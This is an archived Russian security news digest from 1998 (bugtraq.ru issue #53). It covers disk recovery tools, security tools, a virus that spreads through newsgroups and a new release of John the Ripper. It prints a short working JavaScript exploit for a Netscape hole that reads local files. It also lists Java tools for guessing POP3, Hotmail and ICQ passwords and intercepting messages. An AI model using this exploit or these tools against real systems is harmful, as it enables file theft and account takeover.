информационная безопасность
без паники и всерьез
 подробно о проекте 		Rambler's Top100Атака на InternetПортрет посетителяSpanning Tree Protocol: недокументированное применение
BugTraq.Ru
 Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Microsoft Authenticator теряет... 
 Облачнолазурное 
 TeamViewer обвинил в своем взломе... 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / обзор / архив / 1998
АРХИВ
главная
2024
2023
2022
2021
2020
2019
2018
2017
2016
2015
2014
2013
2012
2011
2010
2009
2008
2007
2006
2005
2004
2003
2002
2001
2000
1999
1998
1997






Подписка:
BuqTraq: Обзор
RSN
РВС
БСК

8 декабря 1998, #53

Мой призыв о помощи оказался услышанным. Буквально в тот момент, когда я, исчерпав все подручные средства, уже собирался с духом для переформатирования моего многострадального диска, пришло письмо от Temuri, вдохнувшее в меня надежду. С помощью Tiramisu, честно проработавшей несколько часов, мне таки удалось вытащить часть информации, с которой уже было распрощался. В общем, рекомендую, утилита из разряда "must have". Позволяет вытаскивать файлы с битых NTFS, FAT16, FAT32 и Novell'овских разделов. После долгой и продолжительной работы создается виртуальный диск, который можно просматривать, и с которого (в зарегистрированных версиях) можно скопировать обнаруженные файлы. По моей статистике шансы на успех - примерно 50 на 50, хотя не исключено, что на небольших винчестерах результаты будут получше.

Так что полуторанедельную эпопею с диском на этом можно считать законченной. Не считая потерянного времени, в итоге я оказался даже в выигрыше, потому как с горя прилично обновил железо :) Ну и от кучи накопленного за пару лет хлама избавился :)

Отчет о круглом столе подготовлен и выложен. На конец декабря (числа 24-го, окончательно будет известно позднее) запланирован еще один стол, более узкой направленности.

В процессе подготовки - американское зеркало HackZone. Окончательно оно будет доведено до ума в течение недели. Думаю, после этого процесс установки новых зеркал упростится.

А ведь обзору стукнул год - первый номер вышел седьмого, второй - девятого декабря. Поздравления принимаются :)

В конце прошлой недели случился некий обвал со взломанными сайтами. 9 штук и еще 97. Подробности - в Underground'е

Internet Dynamics приглашает потестировать прототип NTSAfe, включающего в себя средства проверки системных настроек, управления пользователями, группами, файлами, реестром и т.д. - через GUI и командную строку. Обещается, что и после выхода окончательной версии все это хозяйство останется бесплатным.

Очередная дырка в Netscape, позволяющая считать файл на локальном диске и передать его содержимое куда-то вдаль. При этом используется следующий код на JavaScript: 

sl=window.open("wysiwyg://1/file:///C|/");sl2=sl.window.open();
sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your
file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new
java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) &&
(i<100) ) { b +=
String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'";
Правда при этом открывается еще несколько вспомогательных окон, так что пользоваться этой дырой не слишком удобно :)

Ожил сайт Сергея Протасова. Кстати, в этом месяце ему (сайту) исполняется аж два года. Информация стала более структурированной, до нужных документов стало легче добраться. Появился раздел "CGI scripts" - online-сканер портов, finger и т.д.

Серия утилиток от Eyewitness:
Gammaprog - подбор POP3-паролей и паролей для web-based почты (hotmail, usa.net, yahoo).
Thetaprog - подбор паролей Hotmail с помощью их же системы восстановления забытых паролей.
Xyprog - подбор паролей для ICQ.
Roprog - перевод IP-адреса в ICQ UIN (если ICQ там запущен, разумеется).
Upsilonprog - определение ICQ-порта.
Toprog - перехват ICQ-сообщений.

Все программки написаны на Java, исходники прилагаются.

Информация от ДиалогНауки - вроде бы просто очередной вирус, но примечателен способ распространения - при запуске на машине, подключенной к сети, он соединяется с NNTP-сервером, забирает с него первый попавшийся постинг в конференцию типа alt.hacker, alt.binaries..., определяет адрес отправителя и посылает ему некое письмо с приаттаченным зараженным файлом. А потом до кучи отправляет еще письмо на некий адрес с известием о заражении. Забавно.

На той неделе вышел John the Ripper 1.6. Среди новых возможностей - поддержка паролей NT (только LAN Manager'овых) и Kerberos AFS.

На KarDinal Zone под скромным именем NoName приютился раздел Hacking. Внутри - немного новостей, немного софта, немного ссылок, а также довольно приличная подборка русскоязычных текстов - некоторые достаточно известные, некоторые я встретил впервые. Пожелаем дальнейших успехов и напомним, что на странице ? обещано, что она откроется через 22 дня - 30 ноября :)

У вас есть новость или ссылка, заслуживающие внимания наших читателей ? Пишите.

«     »



анонимность клоуны конференции спам уязвимости .net acrobat activex adobe android apple beta bgp bitcoin blaster borland botnet chrome cisco crypto ctf ddos dmca dnet dns dos dropbox eclipse ecurrency eeye elcomsoft excel facebook firefox flash freebsd fsf github gnome google gpl hp https ibm icq ie intel ios iphone java javascript l0pht leak linux livejournal mac mcafee meltdown microsoft mozilla mysql netware nginx novell ny open source opera oracle os/2 outlook password patch php powerpoint programming pwn2own quicktime rc5 redhat retro rip router rsa safari sco secunia server service pack shopping skype smb solaris sony spyware sql injection ssh ssl stuff sun symantec torrents unix virus vista vmware vpn wikipedia windows word xp xss yahoo yandex youtube



Rambler's Top100
Рейтинг@Mail.ru





  Copyright © 2001-2024 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach